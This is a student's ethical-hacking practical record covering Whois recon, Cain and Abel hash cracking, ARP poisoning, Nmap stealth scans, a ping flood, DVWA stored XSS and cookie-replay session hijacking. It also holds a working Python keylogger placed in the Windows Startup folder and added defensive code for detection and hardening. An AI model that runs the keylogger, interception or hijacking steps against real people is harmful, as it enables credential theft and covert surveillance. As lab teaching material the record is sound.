Eh - 754 All Practical


TYBSc CS SEM VI ROLL NO. 754

Practical No: 01

Aim: Google and Whois Reconnaissance:


A. Use Google search techniques to gather information about a specific target or
organization.
B. Utilize advanced search operators to refine search results and access hidden
information.
C. Perform Whois lookups to retrieve domain registration information and gather
details about the target's infrastructure.

Case 1 :-
Step 1: Search for any website in the browser; in this case we have searched for PrestaShop.

Step 2: Some information about the searched website from Wikipedia.

Step 3: Official website of PrestaShop.

Ethical hacking
TYBSc CS SEM VI ROLL NO. 754

Step 4: Now search in the browser for who.is or godaddy.com.

Step 5: Some information about who.is from Wikipedia.

Step 6: Open the official website of who.is and enter the domain of the website whose information we want to know.

Step 7: After entering the domain name or IP address, hit Enter.

Step 8: Information that who.is knows about PrestaShop.

Step 9: After looking at the information that is available on who.is, one can also look at the DNS records of the searched website.

Step 10: Once done with the DNS records, one can look at the Diagnostic section, in which the who.is server sends a request to the server of the searched website, that is, the PrestaShop server.

Case 2:-

Step 1: Search for any website in the browser; in this case we have searched for Amazon Prime Video.

Step 2: Some information about the searched website from Wikipedia.

Step 3: Official website of Amazon Prime Video.

Step 4: Now search in the browser for who.is or godaddy.com.

Step 5: Some information about who.is from Wikipedia.

Step 6: Open the official website of who.is and enter the domain of the website whose information we want to know.

Step 7: After entering the domain name or IP address, hit Enter.

Step 8: Information that who.is knows about Prime Video.

Step 9: After looking at the information that is available on who.is, one can also look at the DNS records of the searched website.

Step 10: Once done with the DNS records, one can look at the Diagnostic section, in which the who.is server sends a request to the server of the searched website, that is, the Prime Video server.

Practical No: 02

Aim : Password Encryption and Cracking with CrypTool and Cain and Abel
A. Use CrypTool to encrypt and decrypt passwords using the RC4 algorithm.
B. Use Cain and Abel for cracking Windows account password using Dictionary
attack and brute force attack.

Procedure :-

A. CrypTool

Step 1: Interface of the CrypTool

Step 2: Now enter the plaintext that is to be encrypted; in order to do so, click on File → New.

Step 3: Select the algorithm that is to be used for encrypting the plaintext. In this case we are making use of a symmetric encryption algorithm. In order to do so we need to click on “Encrypt / Decrypt → Symmetric (modern) → RC4”.

Step 4: Here we need to enter the key length and the key that should be used to encrypt the plaintext with the RC4 algorithm.

Step 5: After clicking on the Encrypt button, the ciphertext of the respective plaintext will be displayed.

Step 6: Once the plaintext is encrypted successfully, we need to decrypt the ciphertext. This is done the same way as encrypting the plaintext: Encrypt / Decrypt → Symmetric (modern) → RC4 → Decrypt.

Step 7: After clicking on “Decrypt”, the ciphertext will be converted back to plaintext.

B. Use Cain and Abel


For this practical we need to turn off the antivirus of the respective system, because the antivirus does not allow the software to be installed.
Interface:

Step 1: Open the Cain and Abel application, then click on Hash Calculator.

Step 2: The screen given below will appear; enter the plaintext in the respective field and then click on calculate hash.

MD5 :- D08AE25CABA6A431331E222D45638061

Step 3: After the MD5 hash value of the given plaintext is generated, preserve it. Now click on the “Cracker” tab, click on “MD5 Hashes”, then click anywhere on the grid. After clicking on the grid, the “Plus” sign will be enabled, where we need to add the hash value that is to be cracked using a dictionary and brute-force attack.

Step 4: After clicking on the “Plus” sign, a pop-up will appear where we need to enter the MD5 hash value.

Step 5: After entering the MD5 hash value, click on the “OK” button; the MD5 value will appear in the grid. Right-click on the MD5 value in order to launch the Dictionary attack.

Step 6: After clicking on “Dictionary Attack”, the screen given below will appear.

Step 7: In order to make the dictionary attack successful, we need to add the respective key to the “dictionary list” of the software.

Step 8: Insert the updated word list as the input to the dictionary attack.

Step 9: After inserting the word list, click on Start; after some time the respective word will appear in the output of the dictionary attack. If we don’t enter the key in the word list, the dictionary attack will not be able to crack the MD5 hash value.

Step 10: Now, in order to do the “Brute-Force attack”, again right-click on the MD5 value.

Step 11: After clicking on “Brute-Force attack”, the window given below will appear; here just click on the “Start” button to launch the brute-force attack.

Step 12: When we do a brute-force attack after a dictionary attack, we get the output in very little time, but if we do a brute-force attack without performing a prior dictionary attack, the brute-force attack will take a lot of time to crack the MD5 hash value.
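
Seen from the side that stores passwords, the dictionary and brute-force steps above succeed because unsalted MD5 is fast and identical for every user of the same password. This added example (not part of the original practical; the wordlist, iteration count and function names are assumptions) rejects wordlist passwords when they are set and stores a salted PBKDF2 value instead of an MD5 digest.

```python
import hashlib
import hmac
import os

# Constructed sample wordlist; a real check would load the lists crackers use.
WORDLIST = {"password", "123456", "qwerty", "letmein"}
ITERATIONS = 600_000  # assumption: work factor for PBKDF2-HMAC-SHA256


def md5_hex(password: str) -> str:
    """Unsalted MD5 as a hash calculator produces it: fast and deterministic."""
    return hashlib.md5(password.encode()).hexdigest().upper()


def set_password(password: str, wordlist=WORDLIST) -> tuple[bytes, bytes]:
    """Reject wordlist passwords, then return (salt, derived key) for storage."""
    if password.lower() in wordlist:
        raise ValueError("password appears in a known wordlist")
    salt = os.urandom(16)  # per-user salt: equal passwords store differently
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, key


def verify_password(password: str, salt: bytes, key: bytes) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, key)


if __name__ == "__main__":
    # Same input, same MD5 digest, for every account that uses it.
    print(md5_hex("password"))
    salt_a, key_a = set_password("correct horse battery staple")
    salt_b, key_b = set_password("correct horse battery staple")
    print(key_a != key_b)  # salts differ, so the stored values differ
    print(verify_password("correct horse battery staple", salt_a, key_a))
```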


Practical No: 03

Aim: Linux Network Analysis and ARP Poisoning


A. Linux Network Analysis:
1. Execute the ifconfig command to retrieve network interface information.
2. Use the ping command to test network connectivity and analyze the output.
3. Analyze the netstat command output to view active network connections.
4. Perform a traceroute to trace the route packets take to reach a target host.
B. ARP Poisoning:
1. Use ARP poisoning techniques to redirect network traffic on a Windows
system.
2. the effects of ARP poisoning on network communication and Security.

Part A :-
Step 1: Create a virtual machine in order to run Ubuntu OS on the host Windows OS.
Command 1: ipconfig
Windows: ipconfig

Ubuntu: ifconfig


Command 2 :- netstat(Windows)

Ubuntu:


Command 3 :- ping (any ip address or domain name)(Windows):

Ubuntu:

Command 4 :- Traceroute (any ip address or domain name)(Windows):


Ubuntu:

Part B: ARP Poisoning:

Step 1: Open the Cain and Abel application. Once the application is launched successfully, click on “start/stop sniffing” and then click on the “sniffer” tab.

Step 2: Now, in the sniffer tab click anywhere on the grid in order to enable the “plus” sign; once it gets enabled click on it, and the screen given below will appear.

Here, select the “All Test” checkbox, then click on “OK”.

Step 3: The software will find the IP address and default gateway of all devices available on the network.

Step 4: Click on “APR” and then anywhere on the grid in order to enable the plus sign. Once it gets enabled, click on it.

Step 5: On the left side we need to select the default gateway and on the right side we need to select the IP address of the target machine.

Step 6: After specifying the IP address and default gateway of the target machine, click on “start/stop APR”; it will start poisoning the network of the target machine and will capture all the data that is sent from the respective target machine.

Step 7: From the PC whose IP address was entered for poisoning, the user will have to log in to any login page that is not secure, for example http://testphp.vulnweb.com/login.php, enter login credentials and try logging in.

Step 8: After poisoning the network of the target machine, we need to go to the password tab, which is present at the bottom, and from there to the “HTTP” tab, as the requests are sent via the HTTP protocol.
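
A defender can spot the poisoning from Steps 5 and 6 in the target's own ARP cache, because the gateway's IP starts resolving to another host's MAC address. The following added example (not from the original practical; the `arp -a` snapshots, addresses and function names are constructed) compares two snapshots and reports a changed binding and a MAC shared with the gateway.

```python
import re
from collections import defaultdict

ARP_LINE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+((?:[0-9a-f]{2}-){5}[0-9a-f]{2})\s+(\w+)", re.I)

# Constructed `arp -a` snapshots from the target, before and during poisoning.
BEFORE = """
Interface: 192.168.2.43 --- 0xb
  Internet Address      Physical Address      Type
  192.168.2.1           00-11-22-33-44-55     dynamic
  192.168.2.50          0a-1b-2c-3d-4e-5f     dynamic
  224.0.0.22            01-00-5e-00-00-16     static
"""
AFTER = BEFORE.replace("00-11-22-33-44-55", "0a-1b-2c-3d-4e-5f")


def parse_arp(text):
    """Return {ip: mac} for the dynamic entries of Windows `arp -a` output."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m and m.group(3).lower() == "dynamic":
            table[m.group(1)] = m.group(2).lower()
    return table


def arp_findings(before, after, gateway):
    """Compare two parsed snapshots and list signs of ARP cache poisoning."""
    findings = []
    for ip, mac in sorted(after.items()):
        old = before.get(ip)
        if old and old != mac:                      # binding silently replaced
            findings.append(("changed", ip, old, mac))
    by_mac = defaultdict(list)
    for ip, mac in after.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if gateway in ips and len(ips) > 1:         # gateway shares a MAC with a host
            findings.append(("gateway-mac-shared", mac, sorted(ips)))
    return findings


if __name__ == "__main__":
    for f in arp_findings(parse_arp(BEFORE), parse_arp(AFTER), "192.168.2.1"):
        print(f)
```

The credentials in Step 8 are readable only because the login page uses plain HTTP; with HTTPS the redirected traffic is still encrypted.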


Practical No: 04

Aim: Port Scanning with NMap:


A. Use NMap to perform an ACK scan to determine if a port is filtered, unfiltered,
or open.
B. Perform SYN, FIN, NULL, and XMAS scans to identify open ports and their
characteristics.
C. Analyze the scan results to gather information about the target system's network
services.

1. ACK: The ACK scan is enabled by specifying the -sA option. Its probe packet has only the
ACK flag set (unless you use --scanflags).
nmap -sA -T4 scanme.nmap.org
Windows:

Nmap:

2. SYN: Short for synchronize. SYN is a TCP packet sent to another computer requesting
that a connection be established between them.
nmap -p22,113,139 scanme.nmap.org
Windows:


Nmap:

3. FIN: The standard use of a FIN packet is to terminate the TCP connection, typically after
the data transfer is complete.
nmap -sF -T4 scanme.nmap.org
Windows:


Nmap:

4. NULL: Nmap exploits this with three scan types: Null scan (-sN) does not set any bits (TCP
flag header is 0); FIN scan (-sF) sets just the TCP FIN bit...
nmap -sN -p22 scanme.nmap.org
Windows:


Nmap:

5. XMAS: Xmas scan (-sX) sets the FIN, PSH, and URG flags, lighting the packet up like a
Christmas tree.
nmap -sX -T4 scanme.nmap.org
Windows:

Nmap:
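
The flag combinations listed above are also what a defender matches on. This added example (not Nmap's code; addresses and packets are constructed, and the stateless per-source port threshold is an assumption) reads the flag byte from raw TCP headers and reports NULL and Xmas probes outright, and ACK, FIN or SYN probes once one source sends them to several ports.

```python
import struct
from collections import defaultdict

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
# Flag sets used by the scan types described above.
PROBES = {0: "NULL", FIN: "FIN", FIN | PSH | URG: "XMAS", ACK: "ACK", SYN: "SYN"}
ALWAYS_ABNORMAL = {"NULL", "XMAS"}   # no normal TCP stack sends these


def tcp_header(sport, dport, flags):
    """Build a minimal 20-byte TCP header (used for the constructed input)."""
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 1024, 0, 0)


def probe_type(header):
    """Return (destination port, probe name or None) for a raw TCP header."""
    if len(header) < 20:
        raise ValueError("truncated TCP header")
    _sport, dport, _seq, _ack, _offset, flags = struct.unpack("!HHIIBB", header[:14])
    return dport, PROBES.get(flags & 0x3F)   # ignore the ECE/CWR bits


def detect_scans(packets, min_ports=3):
    """packets: iterable of (source IP, raw TCP header). Stateless heuristic:
    ACK, FIN and SYN are normal on their own, so they count only when one
    source sends them to min_ports or more distinct ports."""
    ports = defaultdict(set)
    for src, header in packets:
        dport, name = probe_type(header)
        if name:
            ports[(src, name)].add(dport)
    return sorted((src, name, len(seen)) for (src, name), seen in ports.items()
                  if name in ALWAYS_ABNORMAL or len(seen) >= min_ports)


def sample_packets():
    """Constructed traffic using documentation address ranges."""
    scanner, prober, client = "198.51.100.7", "203.0.113.9", "192.0.2.10"
    pkts = [(scanner, tcp_header(40000, 22, 0))]
    pkts += [(scanner, tcp_header(40000, p, FIN | PSH | URG)) for p in (22, 80)]
    pkts += [(prober, tcp_header(40001, p, ACK)) for p in (22, 113, 139)]
    pkts += [(client, tcp_header(51000, 443, ACK)),
             (client, tcp_header(51000, 443, PSH | ACK))]
    return pkts


if __name__ == "__main__":
    for finding in detect_scans(sample_packets()):
        print(finding)
```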


Practical No: 05

Aim: Network Traffic Capture and DoS Attack with Wireshark and Nemesy.
A. Network Traffic Capture:
1. Use Wireshark to capture network traffic on a specific network interface.
2. Analyze the captured packets to extract relevant information and identify
potential security issues.
B. Denial of Service (DoS) Attack:
1. Use Nemesy to launch a DoS attack against a target system or network.
2. Observe the impact of the attack on the target's availability and
performance.

Step 1: Open Wireshark and start capturing on the Ethernet interface.

Step 2: Go to any website that is not secure and try logging in.
http://testphp.vulnweb.com/login.php

Step 3: Go to Wireshark and enter the filter: http

Step 4: The login details are captured.


Denial of Service (DoS) Attack:

Step 1: Open Command Prompt.

Step 2: Find the ip address of the victim system and put the following command in cmd.
Command: ping 192.168.2.43 -t-100


Step 3: Press Enter, the packets start to deliver

Victim PC’s CPU performance:


Practical No: 06

Aim: Simulate persistent cross-site scripting attack.

Step 1: Copy the DVMA folder from “E:\TYCS EH Tools\DVMA-Master”

Step 2: Paste it into “C:\xampp\htdocs”

Step 3: DVMA → config → config.inc.php.dist

Open this file in any text editor of your choice.

Content of the file.

Step 4: Change the highlighted data in the File:

Step 5: Save the file with the .php extension.

Step 6: Start the XAMPP server (Apache and MySQL) and open http://localhost/DVWA/ in any web browser.

Step 7: Once loaded, the page given below will be displayed. Click on Setup / Reset Database.

Step 8: Scroll down the page and click on “Create / Reset Database”.

Step 9: The fields below should be displayed after clicking the button.

Step 10: Logout and then Login with Username and Password.
Username :- admin
Password:- password


Step 11: Set the DVWA security level to low in the DVWA Security tab; after selecting the security level, click on Submit in order to change it.

Step 12: Click on XSS (Stored) → Fill in the Name and write script code in Message as follows:
<script>{alert("Performed by 754_durgesh ")}</script>

Step 13: Click on Sign Guestbook
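
Why the script from Step 12 runs for every later visitor, and the fix, as an added Python example (not part of the original practical; DVWA itself is PHP, and the table and function names here are hypothetical): the message is stored unchanged and the vulnerable renderer pastes it into HTML, while the hardened renderer encodes it on output.

```python
import html
import sqlite3

# The message entered in Step 12 above.
PAYLOAD = '<script>{alert("Performed by 754_durgesh ")}</script>'


def open_guestbook():
    """In-memory stand-in for the guestbook table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE guestbook (name TEXT, message TEXT)")
    return db


def sign(db, name, message):
    # Stored exactly as submitted. The parameterized query stops SQL
    # injection only; it does nothing about markup inside the message.
    db.execute("INSERT INTO guestbook VALUES (?, ?)", (name, message))


def render_vulnerable(db):
    """Concatenates stored text into HTML, so stored markup becomes live."""
    rows = db.execute("SELECT name, message FROM guestbook")
    return "".join(f"<div>Name: {n}<br>Message: {m}</div>" for n, m in rows)


def render_escaped(db):
    """Encodes on output, so stored markup is displayed as plain text."""
    rows = db.execute("SELECT name, message FROM guestbook")
    return "".join(
        f"<div>Name: {html.escape(n)}<br>Message: {html.escape(m)}</div>"
        for n, m in rows)


if __name__ == "__main__":
    db = open_guestbook()
    sign(db, "test", PAYLOAD)
    print(render_vulnerable(db))   # contains a live <script> element
    print(render_escaped(db))      # shows &lt;script&gt;... as text
```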


Practical No: 08

Aim: Session impersonation with Firefox and Tamper Data


A. Install and configure the Tamper Data add-on in Firefox.
B. Intercept and modify HTTP requests to impersonate a user's session.
C. Understand the impact of session impersonation, and the importance of session
management

Step 1: Install and open Firefox browser → Go to Add-ons and search Tamper.

Step 2: Search for Cookie Editor and Add.


Step 3: After adding both add-ons, go to http://www.techpanda.org/ in a new tab.


Enter Email as: admin@google.com
Enter Password as: Password2010

Step 4: Dashboard page appears


Step 5: Click on Cookie editor Add-on on top right corner. Copy this session id.


Step 6: Go to Firefox Settings / Options / Privacy and delete cookies.

Step 7: Go to Add-ons, select Tamper / Run extension and start Tamper Data → click Yes.

Step 8: Go to techpanda.org and enter the URL as index.php.

Step 9: On the index.php page, paste the copied session id in the cookie and click OK.

You will be logged in to the dashboard directly without logging in.
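
The replay in Steps 5 to 9 works because the server accepts any request that carries a known session id. The following added sketch (not techpanda.org's code and not part of the original practical; the class, cookie name and timeout are assumptions) shows the server-side controls that narrow this: unguessable ids, an idle timeout, client binding, invalidation at logout, and restrictive cookie attributes.

```python
import hashlib
import secrets
from http.cookies import SimpleCookie

IDLE_TIMEOUT = 900  # seconds; assumed value for this sketch


class SessionStore:
    def __init__(self):
        self._sessions = {}  # sid -> [user, user-agent digest, last-seen time]

    @staticmethod
    def _digest(user_agent):
        return hashlib.sha256(user_agent.encode()).hexdigest()

    def login(self, user, user_agent, now):
        sid = secrets.token_urlsafe(32)        # unguessable, issued fresh at login
        self._sessions[sid] = [user, self._digest(user_agent), now]
        return sid

    def validate(self, sid, user_agent, now):
        """Return the user for a live session, else None (and drop the session)."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        user, ua_digest, last_seen = entry
        if now - last_seen > IDLE_TIMEOUT or ua_digest != self._digest(user_agent):
            del self._sessions[sid]            # expired, or sent by another client
            return None
        entry[2] = now                         # sliding idle window
        return user

    def logout(self, sid):
        self._sessions.pop(sid, None)          # a copied id stops working here


def session_cookie(sid):
    """Set-Cookie value with the attributes that limit exposure of the id."""
    cookie = SimpleCookie()
    cookie["session"] = sid
    cookie["session"]["httponly"] = True       # not readable by page scripts
    cookie["session"]["secure"] = True         # never sent over plain HTTP
    cookie["session"]["samesite"] = "Strict"
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()
```

Binding to the User-Agent does not stop a replay from the same browser as in the steps above; logout invalidation and the idle timeout are what bound the lifetime of a copied id.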


Practical No: 09

Aim: Creating a Keylogger with Python


A. Write a Python script that captures and logs keystrokes from a target system.
B. Execute the keylogger script and observe the logged keystrokes.
C. Understand the potential security risks associated with keyloggers and the
importance of protecting against them.

Step 1: Go to the path where your Python file is located and open cmd in the Scripts Folder.
Install the required library.
pip install pynput

Step 2: Create a new file in IDLE and enter the following code.
Input:
from pynput.keyboard import Key, Listener
import logging

log_dir = "C:\\Users\\Administrator\\AppData\\Local\\Programs\\Python\\Python311\\p9.pyw"
logging.basicConfig(filename=(log_dir + "keylogger123.txt"), level=logging.DEBUG, format='%(asctime)s%(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()

Step 3: Save the file with the .pyw extension.


Step 4: Open the Start-up folder as shown below.

Output:
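
For aim C, an added defensive example (not part of the original practical; the extension list, marker strings and sample folder are assumptions): audit a Startup folder for scripts that run at logon and flag those that reference keyboard-hooking libraries such as pynput.

```python
import tempfile
from pathlib import Path

SCRIPT_EXTS = {".py", ".pyw", ".vbs", ".js", ".bat", ".cmd", ".ps1"}
INPUT_HOOK_MARKERS = ("pynput", "keyboard.Listener", "SetWindowsHookEx")


def audit_startup(folder):
    """Return [(file name, reason)] for script files in a Startup folder."""
    findings = []
    for path in sorted(Path(folder).iterdir()):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_EXTS:
            continue
        text = path.read_text(errors="replace")
        hits = [marker for marker in INPUT_HOOK_MARKERS if marker in text]
        if hits:
            reason = "references input-hooking API: " + ", ".join(hits)
        else:
            reason = "script set to run at logon"
        findings.append((path.name, reason))
    return findings


def demo():
    """Run the audit over a constructed folder standing in for Startup."""
    with tempfile.TemporaryDirectory() as folder:
        Path(folder, "p9.pyw").write_text(
            "from pynput.keyboard import Key, Listener\n")
        Path(folder, "backup.bat").write_text("robocopy C:\\data D:\\backup\n")
        Path(folder, "notes.txt").write_text("pynput\n")   # not a script: skipped
        return audit_startup(folder)


if __name__ == "__main__":
    for name, reason in demo():
        print(f"{name}: {reason}")
```

On Windows the per-user folder to pass in is `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup`.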
